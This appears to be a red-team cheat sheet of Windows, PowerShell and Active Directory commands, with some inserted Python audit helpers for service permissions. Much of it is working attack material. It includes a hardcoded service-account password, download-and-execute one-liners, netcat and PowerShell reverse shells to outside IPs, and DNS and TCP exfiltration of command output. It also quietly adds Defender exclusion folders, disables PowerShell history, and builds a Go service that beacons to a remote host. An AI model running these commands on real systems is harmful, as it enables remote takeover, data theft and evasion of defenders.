Win
Windows related: AdminSDHolder / PowerShell / LDAP
Links:
- https://github.com/samratashok/nishang/tree/master/Shells
- http://www.labofapenetrationtester.com/2016/09/amsi.html
- https://github.com/besimorhino/powercat
- https://beta.hackndo.com/service-principal-name-spn/
- A lot of commands: https://mlcsec.com/active-directory-domain-enumeration/#get-current-domain
Run command as another user (runas equivalent)
$passwd = ConvertTo-SecureString 'w3lc0meFr31nd' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential('CASCADE\ArkSvc', $passwd)
Invoke-Command -computername 127.0.0.1 -ScriptBlock { whoami } -credential $cred
Invoke-Command -computername 127.0.0.1 -ScriptBlock { wget http://10.10.15.218/nc.exe -OutFile C:\Users\Public\nc.exe } -credential $cred
Download String and execute (IWR)
powershell -exec bypass -c "iwr('http://10.11.0.134/shell2.ps1')|iex"
HTTP requests (Invoke-webRequest)
From: https://davidhamann.de/2019/04/12/powershell-invoke-webrequest-by-example/
Invoke-WebRequest http://httpbin.org/json
Redirect content to file
$r = Invoke-WebRequest http://httpbin.org/json
$r.RawContent > C:\My\Path\to\file.txt
Set headers
$r = iwr http://httpbin.org/headers -Headers @{'Accept' = 'application/json'; 'X-My-Header' = 'Hello World'}
Send file
$r = Get-Content test.txt -ReadCount 0 | iwr http://httpbin.org/post `
    -Method 'POST' `
    -Headers @{'Content-Type' = 'application/json; charset=utf-8'}
or
iwr http://httpbin.org/post -Method 'POST' -ContentType 'application/json; charset=utf-8' -Body '{"hello": "world"}'
Proxy download
powershell.exe -nop -c "`$wc = New-Object System.Net.Webclient; `$wc.Headers.Add('User-Agent','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) Like Gecko'); `$wc.proxy=[System.Net.WebRequest]::DefaultWebProxy; `$wc.proxy.credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials; IEX (`$wc.downloadstring('$URL'))"
Invoke-Command -computername 127.0.0.1 -ScriptBlock { C:\Users\arksvc\nc.exe 10.10.15.218 1234 -e powershell.exe } -credential $cred
Reverse SHELL
$client = New-Object System.Net.Sockets.TCPClient("163.172.232.45",80);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
Retrieve output using a DNS request
# On your host:
# $ nc -lnvup 53
# Replace <HOSTIP> with ip of the listening machine
powershell -nop -c "$s=New-Object System.Net.Sockets.Socket([System.Net.Sockets.AddressFamily]::InterNetwork,[System.Net.Sockets.SocketType]::Dgram,[System.Net.Sockets.ProtocolType]::UDP);$s.Connect((New-Object System.Net.IPEndPoint([system.net.IPAddress]::Parse(\"<HOSTIP>\"),53)));$s.send(([System.Text.Encoding]::ASCII).GetBytes((whoami)));"
Or using HTTP request (bypassing possible AV):
powershell -c "whoami | % {$w=(New-Object System.IO.StreamWriter((New-Object System.Net.Sockets.TCPClient([System.Net.IPAddress]::Parse(\"<HOSTIP>\"),80)).GetStream()));$w.WriteLine($_);$w.Flush()}"
Dummy port scanner
$ErrorActionPreference = "silentlyContinue" # suppress warnings
1..255 | %{
    $IP = "1.253.241.$_"
    echo "$IP";
    if (Test-Connection "$IP" -Quiet) {
        test-netconnection $IP -Port 80 | findstr /I "TcpTest"
        test-netconnection $IP -Port 443 | findstr /I "TcpTest"
        test-netconnection $IP -Port 8080 | findstr /I "TcpTest"
        test-netconnection $IP -Port 8081 | findstr /I "TcpTest"
    }
}
Not PowerShell? Check out: https://github.com/Ben0xA/nps
Modify AV exclusion directory
Article: https://www.fortynorthsecurity.com/remotely-modify-anti-virus-configurations/
Red teamers, you can turn off Defender from admin powershell with 'Set-MpPreference -DisableRealTimeMonitoring $true' but it will result in a balloon notification for anyone logged on. Instead, use 'Add-MpPreference -ExclusionPath "c:\temp"' to silently add an exclusions folder.
Pingcastle
- Patch the code & build
- Use --no-enum-limit
AdminSDHolder
How can you tell whether an account is protected by AdminSDHolder?
The most reliable way to know whether an account is protected by this process is to look at the Active Directory attribute "adminCount". If it is set to "1", the object has been modified by AdminSDHolder.
The following PowerShell/LDAP query returns the list of affected users (the individual filter terms must be combined with "&" to form a valid LDAP filter):
Get-ADUser -LDAPFilter "(&(objectcategory=person)(samaccountname=*)(admincount=1))"
The following PowerShell/LDAP query returns the list of affected groups:
Get-ADGroup -LDAPFilter "(&(objectcategory=group)(admincount=1))"
Get-ADObject -SearchBase "CN=AdminSDHolder,CN=System,DC=gamac,DC=intra" -LDAPFilter "(objectclass=top)" -Properties * | select -ExpandProperty nTSecurityDescriptor | Format-Table -AutoSize -Wrap
PS C:\Users\user_seek> $acl = Get-Acl "AD:\CN=AdminSDHolder,CN=System,DC=gamac,DC=intra"
PS C:\Users\user_seek> ConvertFrom-SddlString -Sddl $acl.Sddl -Type RegistryRights |Foreach-Object {$_.DiscretionaryAcl}
Remove powershell history
# example 1: disable history saving entirely
Set-PSReadlineOption -HistorySaveStyle SaveNothing
Citrix
CitrixReceiver
Install Citrix Receiver without being prompted to register an email address:
CitrixReceiver.exe /ALLOWADDSTORE=N [/Silent]
Create fake and weak service
This was tested on Windows Server 2019
- Create a user
- Create the service with an unquoted binary path
> sc create "Some Vulnerable Service" binpath= "C:\Program Files\A Subfolder\B Subfolder\C Subfolder\SomeExecutable.exe" Displayname= "Vuln Service DP" start= auto
// Create Directory
> mkdir "C:\Program Files\A Subfolder\B Subfolder\C Subfolder"
> icacls "C:\Program Files\A Subfolder"
// Give user rights
> icacls "C:\Program Files\A Subfolder" /grant "BUILTIN\Users":W
- Allow one user to start/stop the service [http://woshub.com/set-permissions-on-windows-service/]
sc.exe sdshow <SERVICE>
D:(A;;CCLCSWLOCRRC;;;AU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCLCSWRPWPDTLOCRRC;;;SY)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
S: — System Access Control List (SACL)
D: — Discretionary ACL (DACL)
The first letter inside each parenthesised ACE is the ACE type: allow (A) or deny (D).
CC — SERVICE_QUERY_CONFIG (request service settings)
LC — SERVICE_QUERY_STATUS (service status polling)
SW — SERVICE_ENUMERATE_DEPENDENTS
LO — SERVICE_INTERROGATE
CR — SERVICE_USER_DEFINED_CONTROL
RC — READ_CONTROL
RP — SERVICE_START
WP — SERVICE_STOP
DT — SERVICE_PAUSE_CONTINUE
The last field of each ACE is the trustee (user, group or SID) that is granted the permissions. Predefined two-letter abbreviations exist for well-known groups:
AU Authenticated Users
AO Account operators
RU Alias to allow previous Windows 2000
AN Anonymous logon
BA Built-in administrators
BG Built-in guests
BO Backup operators
BU Built-in users
CA Certificate server administrators
CG Creator group
CO Creator owner
DA Domain administrators
DC Domain computers
DD Domain controllers
DG Domain guests
DU Domain users
EA Enterprise administrators
ED Enterprise domain controllers
WD Everyone
PA Group Policy administrators
IU Interactively logged-on user
LA Local administrator
LG Local guest
LS Local service account
SY Local system
NU Network logon user
NO Network configuration operators
NS Network service account
PO Printer operators
PS Personal self
PU Power users
RS RAS servers group
RD Terminal server users
RE Replicator
RC Restricted code
SA Schema administrators
SO Server operators
SU Service logon user
Instead of a predefined group, you can explicitly specify a user or group by SID. To get the SID for the current user, you can use the command:
whoami /user
Or you can find the SID for any domain user using the Get-ADUser cmdlet:
Get-ADUser -Identity 'sadams' | select SID
You can get the SID of the AD security group using the Get-ADGroup cmdlet:
Get-ADGroup -Filter {Name -eq "ny-ithelpdesk"} | Select SID
wmic useraccount get name, sid
sc sdset <SERVICE> "D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)(A;;RPWPCR;;;S-1-5-21-2133228432-2794320136-1823075350-1000)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)"
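To make the SDDL strings above easier to audit, here is a small parser (an added example, not part of the original notes or of the woshub article) that splits a service DACL into ACEs and flags any allow-ACE giving a broad trustee (Authenticated Users, Everyone, interactive users, ...) a right that lets it reconfigure, stop or take over the service. The expansions of DC, SD, WD and WO are the standard SDDL meanings; they are not listed in the table above.

```python
import re

# Service-specific rights: the abbreviations explained above plus the standard
# SDDL names for DC/SD/WD/WO, which appear in the sc sdshow/sdset strings above.
SERVICE_RIGHTS = {
    "CC": "SERVICE_QUERY_CONFIG", "DC": "SERVICE_CHANGE_CONFIG",
    "LC": "SERVICE_QUERY_STATUS", "SW": "SERVICE_ENUMERATE_DEPENDENTS",
    "RP": "SERVICE_START", "WP": "SERVICE_STOP", "DT": "SERVICE_PAUSE_CONTINUE",
    "LO": "SERVICE_INTERROGATE", "CR": "SERVICE_USER_DEFINED_CONTROL",
    "SD": "DELETE", "RC": "READ_CONTROL", "WD": "WRITE_DAC", "WO": "WRITE_OWNER",
}
# Rights that let a principal reconfigure, stop or take over the service.
SENSITIVE = {"DC", "WP", "SD", "WD", "WO"}
# Broad, low-trust trustees from the well-known abbreviation table above.
BROAD = {"AU": "Authenticated Users", "BU": "Built-in users", "WD": "Everyone",
         "IU": "Interactively logged-on user", "AN": "Anonymous logon"}

ACE_RE = re.compile(r"\(([^)]*)\)")


def parse_dacl(sddl):
    """Return the DACL ACEs of a service SDDL string as dicts (SACL is ignored)."""
    dacl = sddl.split("D:", 1)[1].split("S:", 1)[0]
    aces = []
    for ace in ACE_RE.findall(dacl):
        # ACE layout: type;flags;rights;object_guid;inherit_object_guid;trustee
        ace_type, _flags, rights, _obj, _inh, trustee = ace.split(";")
        aces.append({
            "type": "allow" if ace_type == "A" else "deny",
            "rights": [rights[i:i + 2] for i in range(0, len(rights), 2)],
            "trustee": trustee,
        })
    return aces


def risky_aces(sddl):
    """Allow-ACEs that grant a SENSITIVE right to a BROAD trustee."""
    findings = []
    for ace in parse_dacl(sddl):
        if ace["type"] != "allow" or ace["trustee"] not in BROAD:
            continue
        granted = sorted(set(ace["rights"]) & SENSITIVE)
        if granted:
            findings.append((BROAD[ace["trustee"]],
                             [SERVICE_RIGHTS[r] for r in granted]))
    return findings


# Constructed inputs: the sdshow output above, plus a deliberately weak DACL.
DEFAULT_SD = ("D:(A;;CCLCSWLOCRRC;;;AU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)"
              "(A;;CCLCSWRPWPDTLOCRRC;;;SY)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)")
WEAK_SD = "D:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;AU)(A;;CCLCSWLOCRRC;;;SY)"
```

`risky_aces(DEFAULT_SD)` is empty because Authenticated Users only get query rights, while `risky_aces(WEAK_SD)` reports the change-config, delete, WRITE_DAC, WRITE_OWNER and stop rights handed to Authenticated Users.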
- Build service (Go, using github.com/kardianos/service; the dial result is now closed so the service does not leak sockets)
package main

import (
    "log"
    "net"
    "time"

    "github.com/kardianos/service"
)

var host = "unixed.fr"
var port = "80"
var logger service.Logger

type program struct{}

func (p *program) Start(s service.Service) error {
    // Start should not block. Do the actual work async.
    go p.run()
    return nil
}

func (p *program) run() {
    // Every 10 seconds, open a TCP connection to host:port and close it again.
    timeout := 1 * time.Second
    for {
        if conn, err := net.DialTimeout("tcp", host+":"+port, timeout); err == nil {
            conn.Close() // release the socket; the connection itself is the "ping"
        }
        time.Sleep(10 * time.Second)
    }
}

func (p *program) Stop(s service.Service) error {
    // Stop should not block. Return within a few seconds.
    return nil
}

func main() {
    svcConfig := &service.Config{
        Name:        "My Service (ping)",
        DisplayName: "My Service (ping)",
        Description: "This service will 'ping' a server of mine each 10 secs.",
    }
    prg := &program{}
    s, err := service.New(prg, svcConfig)
    if err != nil {
        log.Fatal(err)
    }
    logger, err = s.Logger(nil)
    if err != nil {
        log.Fatal(err)
    }
    err = s.Run()
    if err != nil {
        logger.Error(err)
    }
}
Find vulnerable service:
> wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows\\" | findstr /i /v """
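The same check as the findstr chain above, re-implemented in Python so it can be run over saved wmic output during an audit (an added example, not code from the original notes). The sample table is constructed; it assumes wmic's default layout where columns are padded with at least two spaces.

```python
import re

# Constructed sample of `wmic service get name,pathname,displayname,startmode`
# output (columns are padded with at least two spaces, as wmic does).
SAMPLE = r"""Name      PathName                                                                DisplayName       StartMode
Spooler   C:\Windows\System32\spoolsv.exe                                         Print Spooler     Auto
VulnSvc   C:\Program Files\A Subfolder\B Subfolder\C Subfolder\SomeExecutable.exe   Vuln Service DP   Auto
GoodSvc   "C:\Program Files\Good App\good.exe" -service                            Good Service      Auto
OtherSvc  C:\Program Files\Other App\other.exe                                    Other Service     Manual
ToolSvc   C:\Tools\svc.exe                                                        Tool Service      Auto
"""


def parse_wmic_table(text):
    """Split wmic's padded table into dicts keyed by the header names."""
    lines = [ln.strip() for ln in text.splitlines() if ln.strip()]
    header = re.split(r"\s{2,}", lines[0])
    return [dict(zip(header, re.split(r"\s{2,}", ln))) for ln in lines[1:]]


def is_unquoted_path(pathname):
    """Mirror the findstr chain: path is unquoted, outside the Windows directory,
    and contains a space somewhere before the executable name."""
    low = pathname.strip().lower()
    if low.startswith('"'):
        return False
    # Keep only the part up to the executable, dropping any arguments after it.
    exe = low[: low.find(".exe") + 4] if ".exe" in low else low
    if exe.startswith("c:\\windows\\"):
        return False
    return " " in exe


def find_unquoted_auto_services(text):
    """Names of auto-start services whose binary path is unquoted and has spaces."""
    return [row["Name"] for row in parse_wmic_table(text)
            if row["StartMode"].lower() == "auto" and is_unquoted_path(row["PathName"])]
```

On the sample only VulnSvc is reported: Spooler lives under C:\Windows, GoodSvc is quoted, OtherSvc is not auto-start and ToolSvc has no space in its path.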